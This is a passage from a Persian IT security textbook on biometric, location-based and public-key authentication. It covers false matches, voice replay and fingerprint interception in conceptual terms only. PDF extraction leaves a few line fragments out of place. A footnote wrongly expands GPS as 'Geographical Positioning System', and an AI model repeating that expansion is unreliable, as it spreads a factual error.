ﻼ ﺛﺒﺖ ﺷـﺪﻩ ﻣﻘﺎﻳـﺴﻪ ﻣـﻲﮔـﺮﺩﺩ .ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺯﻳـﺴﺘﻲ ﺩﺭ
ﻣﻲﺷﻮﺩ .ﺩﺭ ﻭﺭﻭﺭﺩﻫﺎﻱ ﺑﻌﺪﻱ ،ﺑﻴﻮﻣﺘﺮﻳﻚ ﺟﺪﻳﺪ ﺑﺎ ﺁﻧﭽﻪ ﻗﺒ ﹰ
ﺗﺸﺨﻴﺺ ﻗﻄﻌﻲ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺑﺰﺭﮒ ﺑﺮﺍﻱ ﺗﻨﺎﻇﺮ ﻧﺎﻣﻬﺎ ﺑﺎ ﺑﻴﻮﻣﺘﺮﻳﻚﻫﺎ ﺍﻳﺠﺎﺩ ﺷﻮﺩ .ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ،ﭘﻠـﻴﺲ ﻓـﺪﺭﺍﻝ
ﺁﻣﺮﻳﻜﺎ ) (FBIﺑﻪ ﭼﻨﻴﻦ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻣﺠﻬﺰ ﺍﺳﺖ ﻛﻪ ﻳﻜﻲ ﺍﺳﺎﻣﻲ ﺭﺍ ﺑﺎ ﺍﺛﺮ ﺍﻧﮕﺸﺘﺎﻥ ﻭ ﺩﻳﮕﺮﻱ ﺑﺎ ﻋﻨﺎﺻﺮ DNAﺗﻄﺒﻴﻖ ﻣﻲﺩﻫﺪ.
ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭ ﻧﺸﺎﻧﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ،ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﺩﻭ ﻣﺰﻳﺖ ﻭﺍﺿﺢ ﺩﺍﺭﺩ .ﺁﻧﻬﺎ ﻓﺮﺍﻣﻮﺵ ﻭ ﻳﺎ ﮔﻢ ﻧﻤﻲﺷـﻮﻧﺪ،
ﻭ ﺑﺮﺍﺣﺘﻲ ﻧﻴﺰ ﻗﺎﺑﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻦ ،ﻛﭙﻲﺑﺮﺩﺍﺭﻱ ،ﻭ ﻳﺎ ﺳﺮﻗﺖ ﻧﻤﻲﺑﺎﺷﻨﺪ .ﻭﻟﻲ ﺍﻧﺘﻘﺎﻝ ﺗﻜﻨﻮﻟﻮﮊﻱ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺍﺯ ﺁﺯﻣﺎﻳﺸﮕﺎﻫﻬﺎ ﺑﻪ ﺳﻄﺢ
ﺑﺎﺯﺍﺭ ﻣﺸﻜﻞ ﺍﺳﺖ .ﺩﺭ ﻫﻤﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺳﻄﺢ ﻣﻌﻴﻨﻲ ﺍﺯ ) False Positiveﺍﺷـﺘﺒﺎﻩ ﻣﺜﺒـﺖ( ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ،ﻛـﻪ ﺩﺭ ﺁﻥ ﺳﻴـﺴﺘﻢ
ﺗﻄﺒﻴﻘﻲ ﺭﺍ ﻛﻪ ﻧﺒﺎﻳﺪ ﺍﻋﻼﻡ ﻛﻨﺪ ،ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ .ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ) False Negativeﺍﺷﺘﺒﺎﻩ ﻣﻨﻔﻲ( ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻛﻪ ﺩﺭ ﺁﻥ ﺳﻴﺴﺘﻢ
ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﻭ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺍﺯ ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﻫﺴﺘﻨﺪ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﺯ ﻳﻚ ﺷﺨﺺ ﻭﺍﺣﺪ ﻣﻲﺑﺎﺷـﻨﺪ .ﺑـﺮﺍﻱ ﻛـﺎﻫﺶ ﺍﻣﻜـﺎﻥ ﺗﻄﺒﻴﻘﻬـﺎﻱ
ﻻ ﺍﺯ
ﺍﺷﺘﺒﺎﻩ ،ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻴﻮﻣﺘﺮﻳﻚ ،ﻣﻌﻴﺎﺭ ﺯﻳﺴﺘﻲ ﺭﺍ ﺑﺎ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻳﺎ ﻧﺸﺎﻥ ﺗﺮﻛﻴﺐ ﻣﻲﻛﻨﻨﺪ .ﺩﺭ ﻣﻮﺭﺩ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻣﻌﻤـﻮ ﹰ
ﻛﺎﺭﺑﺮ ﺧﻮﺍﺳﺘﻪ ﻣﻲﺷﻮﺩ ﮐﻪ ﻳﻚ ﻛﺪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﺨﻔﻲ ﻣﺜﻞ PINﺭﺍ ﺗﺎﻳﭗ ﻛﻨﺪ ﻭ ﺳﭙﺲ ﻳﻚ ﻧﻤﻮﻧﺔ ﺑﻴـﻮﻣﺘﺮﻳﻜﻲ ،ﻣﺜـﻞ ﺣﺎﻟـﺖ ﺻـﺪﺍﻳﺶ ﺭﺍ
ﺍﺭﺍﺋﻪ ﺩﻫﺪ .ﺳﻴﺴﺘﻢ ﺍﺯ ﺁﻥ ﮐﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﻳﻚ ﭘﺮﻭﻧﺪﺓ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ،ﻭ ﺳﭙﺲ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺭﺍ ﺑﺎ ﺍﻟﮕﻮﻱ ﺫﺧﻴﺮﻩﺷـﺪﻩ
ﻣﻘﺎﻳﺴﻪ ﻣﻲﻧﻤﺎﻳﺪ .ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ،ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺭﺍ -ﺑﺠﺎﻱ ﺗﻤﺎﻡ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ -ﺑـﺎ ﺗﻨﻬـﺎ ﻳﻜـﻲ ﺍﺯ ﻣﻘـﺎﺩﻳﺮ ﻣﻌﻴﺎﺭﻫـﺎﻱ
ﺫﺧﻴﺮﻩﺷﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻛﻨﺪ.
ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﺩﻗﻴﻖ ﻧﻴﺴﺘﻨﺪ؛ ﭼﺮﺍﮐﻪ:
• ﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺷﺨﺺ ﺑﺨﻮﺍﻫﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﺩ ،ﻣﺸﺨﺼﺎﺕ ﺑﻴﻮﻣﺘﺮﻳﻜﻲ ﻭﻱ ﺑﺎﻳﺪ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺭﺍﻳﺎﻧﻪ ﺑﺎﺷﺪ؛
• ﺍﮔﺮ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻣﺸﺨﺼﻪﻫﺎﻱ ﺑﻴﻮﻣﺘﺮﻳﻜﻲ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ،ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮ ﺍﺳﺎﺱ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺑﻲﺍﺭﺯﺵ ﺧﻮﺍﻫﺪ ﺷﺪ؛ ﻭ
• ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﺑﻄﻮﺭ ﺧﺎﺹ ﺣﻔﺎﻇﺖ ﻧﺸﻮﺩ ،ﺗﺠﻬﻴﺰﺍﺕ ﻧﺴﺒﺖ ﺑﻪ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﺗﺤﺮﻳﻒ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺧﻮﺍﻫﻨﺪ ﺑـﻮﺩ.
ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻳﻚ ﺩﺯﺩ ﺑﺎﻫﻮﺵ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮ ﺍﺳﺎﺱ ﺻـﺪﺍ ،ﺑﺘﻮﺍﻧـﺪ ﺑـﺎ ﺿـﺒﻂ ﻛـﺮﺩﻥ ﺻـﺪﺍﻱ
ﺷﺨﺺ ﻣﺠﺎﺯ )ﻭﻗﺘﻲ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻣﻲﮔﻮﻳـﺪ( ،ﺑﺎﺯ ﮔﺮﺩﺍﻧﺪﻥ ﻧﻮﺍﺭ ﺑﻪ ﻋﻘﺐ ،ﻭ ﺳﭙﺲ ﭘﺨﺶ ﻣﺠﺪﺩ ﺻﺪﺍﻱ ﺿﺒﻂ ﺷـﺪﻩ ،ﺁﻥ ﺳﻴـﺴﺘﻢ ﺭﺍ
ﻓﺮﻳﺐ ﺩﻫﺪ.
ﻣﻜﺎﻥ :ﺟﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻳﺪ
ﺑﺎ ﺗﻮﺳﻌﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺼﻮﺭﺗﻴﻜﻪ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺘﻮﺍﻧﻨﺪ ﻣﺤﻞ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺭﺍ ﻣﻌـﻴﻦ ﻛﻨﻨـﺪ ،ﺍﻣـﺮﻭﺯﻩ ﺍﺳـﺘﻘﺮﺍﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺗـﺼﺪﻳﻖ
ﻫﻮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻮﻗﻌﻴﺖ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺍﺳﺖ .ﺍﮔﺮﭼﻪ ﺳﻴﺴﺘﻢ ﻣﻮﻗﻌﻴﺖﻳﺎﺏ ﺟﻬﺎﻧﻲ ) ١٢٩(GPSﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﺤـﻞ
ﻻ ﺩﺭ ﺍﺗﺎﻗﻬـﺎﻱ ﺩﺭﺑـﺴﺘﻪ ﻛـﺎﺭ
ﺑﻜﺎﺭ ﺭﻭﺩ ،ﺍﻣﺎ ﺩﻭ ﻣﺎﻧﻊ ﺟﺪﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ GPSﺩﺭ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ :ﻳﻜـﻲ ﺍﻳﻨﻜـﻪ GPSﻣﻌﻤـﻮ ﹰ
ﻧﻤﻲﻛﻨﺪ ،ﻭ ﺩﻳﮕﺮ ﺍﻳﻨﻜﻪ ﻫﻴﭻ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﺍﻳﻤﻦ ﺍﻃﻼﻋﺎﺕ ﻣﻜﺎﻧﻲ ﺍﺯ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ GPSﺑﻪ ﺳﺮﻭﻳﺲ ﺭﺍﻩ ﺩﻭﺭ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﺭﺯﻳـﺎﺑﻲ
ﺻﺤﺖ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﺪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ .ﻳﻚ ﺍﻧﺘﺨﺎﺏ ﺑﻬﺘﺮ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺒﺘﻨﻲ ﺑـﺮ ﻣﻮﻗﻌﻴـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺧـﺪﻣﺎﺕ ﻣﻜـﺎﻧﻲ
)ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻮﻗﻌﻴـﺖ( ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺗﻮﺳﻂ ﺑﻌﻀﻲ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻱ ﺗﻠﻔﻦ ﻣﻮﺑﺎﻳﻞ ﺍﺳﺖ .ﺑﺎ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺷﺒﻜﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻜـﺎﻥ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺗـﺸﺨﻴﺺ
ﺩﻫﺪ ﻭ ﺳﭙﺲ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﻣﺮﻛﺰ ﺧﺪﻣﺎﺕ ﮔﺰﺍﺭﺵ ﻛﻨﺪ ،ﺑﺪﻭﻥ ﻧﮕﺮﺍﻧﻲ ﺍﺯ ﺍﻣﻜﺎﻥ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺍﻃﻼﻋـﺎﺕ
ﻫﻨﮕﺎﻡ ﺍﻧﺠﺎﻡ ﺷﺪﻥ ﻋﻤﻠﻴﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ.
129 Geographical Positioning System
٣١٧
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻳﻚ ﺷﻜﻞ ﺳﺎﺩﺓ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺮ ﺍﺳﺎﺱ ﻣﺤﻞ ،ﺩﺍﺷﺘﻦ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﭘﺎﻳﺎﻧﺔ ﻣﺨﺼﻮﺻﻲ ﺍﺳﺖ ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺍﺟﺮﺍﻱ ﻳﻚ ﻋﻤـﻞ ﺧـﺎﺹ ﺑﺎﺷـﺪ.
ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﺩﻳﮕﺮ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺍﺯ ﺩﺍﺷﺘﻦ ﭼﻨﻴﻦ ﺍﻣﺘﻴﺎﺯﺍﺗﻲ ﻣﺤﺮﻭﻡ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ .ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ" ،ﻣﻮﻗﻌﻴﺖ" ﻫﻨﻮﺯ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ
ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻜﺎﺭ ﻧﺮﻓﺘﻪ ﺍﺳﺖ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ
ﺗﻜﻨﻴﻜﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻪ ﭘﻴﺸﺘﺮ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷﺪ ﻫﻤﻪ ﺩﺍﺭﺍﻱ ﻳﻚ ﻧﻘﺺ ﻣﺸﺘﺮﻙ ﻫﺴﺘﻨﺪ :ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﻳـﻚ ﻓـﺮﺩ
ﺑﺼﻮﺭﺕ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ،ﺁﻥ ﺷﺨﺺ ﺑﺎﻳﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺨﺼﻲ ﻛﻪ ﻋﻤﻠﻴﺎﺕ ﺷﻨﺎﺳﺎﻳﻲ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ ﺣﺎﺿﺮ ﺑﺎﺷﺪ .ﺍﮔﺮ ﺁﻥ ﺷﺨﺺ
ﺣﺎﺿﺮ ﻧﺒﺎﺷﺪ -ﺍﮔﺮ ﺷﻨﺎﺳﺎﻳﻲ ﺑﻮﺳﻴﻠﻪ ﺗﻠﻔﻦ ،ﻓﺎﻛﺲ ،ﻭ ﻳﺎ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ -ﺑﺪﻟﻴﻞ ﺍﻣﻜﺎﻥ ﻭﻗﻮﻉ "ﺣﻤﻼﺕ ﺗﻜﺮﺍﺭ" ،ﺍﺣﺘﻤـﺎﻝ
ﺗﺤﺮﻳﻒ ﻭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺴﻴﺎﺭ ﺑﺎﻻﺳﺖ.
ﻣﻮﻗﻌﻴﺘﻲ ﺭﺍ ﺗﺼﻮﺭ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺍﺛﺮ ﺍﻧﮕﺸﺖ ﻛﺎﺭﺑﺮ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﻨﺪ ﻭ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮﻱ ﻋﻤﻠﻴﺎﺕ ﺍﺭﺯﻳﺎﺑﻲ ﺻﺤﺖ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ.
ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻛﺪ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺛﺮ ﺍﻧﮕـﺸﺖ ﺭﺍ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺍﺯ ﺭﻭﻱ ﺷـﺒﻜﻪ ﻣﻨﺘﻘـﻞ ﻣـﻲﺷـﻮﺩ ﺑـﺪﺯﺩﺩ.
ﻫﻤﻴﻨﻜﻪ ﻣﻬﺎﺟﻢ ﺍﻧﺘﻘﺎﻝ ﺍﺛﺮ ﺍﻧﮕﺸﺖ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﮔﺮﻓﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺟﻌﻞ ﻫﻮﻳﺖ ﻗﺮﺑﺎﻧﻲ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨـﺪ .ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﮔﻔﺘـﻪ ﺷـﺪ
ﺣﻤﻠﻪﻫﺎﻱ ﺗﻜﺮﺍﺭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻳﻚ ﺗﻬﺪﻳﺪ ﺟﺪﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺸﺨﻴﺺ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ.
ﮔﻔﺘﻴﻢ ﻛﻪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺣﺘﻤﺎﻝ ﺧﻄﺮ ﺣﻤﻼﺕ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﺪ .ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗـﺸﺨﻴﺺ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ،ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻣﻀﺎ ﻭ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﺁﻥ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﭼـﻮﻥ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ﻫﻴﭽﮕـﺎﻩ ﺍﺯ
ﻣﺎﻟﻜﻴﺖ ﺷﺨﺼﻲ ﻛﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﺩ ﺧﺎﺭﺝ ﻧﻤﻲﮔﺮﺩﺩ -ﻭ ﻟﺬﺍ ﻫﻴﭽﮕﺎﻩ ﺭﻭﻱ ﺳﻴﻢ ﻓﺮﺳﺘﺎﺩﻩ ﻧﻤﻲﺷﻮﺩ -ﻫـﻴﭻ ﻓﺮﺻـﺘﻲ ﺑـﺮﺍﻱ ﻣﻬـﺎﺟﻢ
ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺪﺯﺩﺩ ﻭ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﺷﻮﻡ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ.
ﻛﻨﺘﺮﻝ ﻭ ﻣﺪﻳﺮﻳﺖ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ
ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﻓﺮﺩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ،ﺍﺗﻔﺎﻗﻲ ﻛﻪ ﻣﻲﺍﻓﺘﺪ ﺩﻗﻴﻘﹰﺎ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﻧﻴﺴﺖ .ﻗﺎﺩﺭ ﺑﻮﺩﻥ ﺑـﻪ ﺍﻧﺠـﺎﻡ
ﺍﻣﻀﺎﻱ ﻣﻌﺘﺒﺮ ﺍﺛﺒﺎﺕ ﻧﻤﻲﻛﻨﺪ ﻛﻪ ﺷﻤﺎ ﻳﻚ ﺷﺨﺺ ﺧﺎﺹ ﻫﺴﺘﻴﺪ ،ﺑﻠﻜﻪ ﺗﻨﻬﺎ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻳﻚ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧـﺎﺹ ﺩﺭ ﻣﺎﻟﻜﻴـﺖ
ﺷﻤﺎ ﺍﺳﺖ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﻲﺗﻮﺍﻥ ﻛﻠﻴﺪﻫﺎﻳﻲ ﻣﺮﺑﻮﻁ ﺑـﻪ "ﻫـﻴﻼﺭﻱ ﻛﻠﻴﻨﺘـﻮﻥ" ﻭ " "Batmanﺭﺍ
ﻧﻴﺰ ﭘﻴﺪﺍ ﻛﺮﺩ.
ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺗﺒﺪﻳﻞ ﺑﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﻮﺩ ﭼﻨﺪﻳﻦ ﭘﻴﺶ ﺷﺮﻁ ﺑﺎﻳﺪ ﺑﺮﺁﻭﺭﺩﻩ ﮔﺮﺩﺩ:
.١ﻫﺮ ﺟﻔﺖ ﻛﻠﻴﺪ ﻋﻮﻣﻲ /ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺗﻨﻬﺎ ﺑﻮﺳﻴﻠﺔ ﻳﻜﻨﻔﺮ ﺑﻜﺎﺭ ﺭﻭﺩ.
130 Realtime
131 Challenge Data
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﻫﻢ ﺑـﺼﻮﺭﺕ onlineﻭ ﻫـﻢ ﺑـﺼﻮﺭﺕ offlineﺑﻜـﺎﺭ ﺭﻭﺩ .ﺩﺭ ﺣﺎﻟـﺖ ﺗـﺼﺪﻳﻖ
ﻫﻮﻳﺖ ﺑﺼﻮﺭﺕ ،offlineﻛﺎﺭﺑﺮ ﻳﻚ ﭘﻴﺎﻡ ﺍﻣﻀﺎﺷﺪﺓ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺻﺤﺖ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺁﻳﻨﺪﻩ ﺍﺭﺯﻳﺎﺑﻲ ﺷﻮﺩ .ﺩﺭ ﺣﺎﻟﺖ ﺗـﺼﺪﻳﻖ
ﻫﻮﻳﺖ ،onlineﻛﺎﺭﺑﺮ ﺑﺼﻮﺭﺕ ﺑﻼﺩﺭﻧﮓ ١٣٠ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﺷﻮﺩ .ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﻳـﻚ
ﺩﺍﺩﺓ ﻣﺒﺎﺣﺜﻪ ١٣١ﮐﻪ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﺍﻳﺠﺎﺩﺷﺪﻩ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﻛﺎﺭﺑﺮ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ ﻭ ﺭﺍﻳﺎﻧﺔ ﻛﺎﺭﺑﺮ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮ ﺁﻧـﺮﺍ ﺑـﺼﻮﺭﺕ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﻣﻀﺎ ﻣﻲﻛﻨﺪ ﻭ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺍﻧﺪ ،ﻭ ﻳﺎ ﺩﺭ ﻳـﻚ ﺭﻭﺵ ﺩﻳﮕـﺮ ،ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺑـﺎ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ ﻛـﺎﺭﺑﺮ ﺩﺍﺩﺓ ﻣﺒﺎﺣﺜـﻪ ﺭﺍ
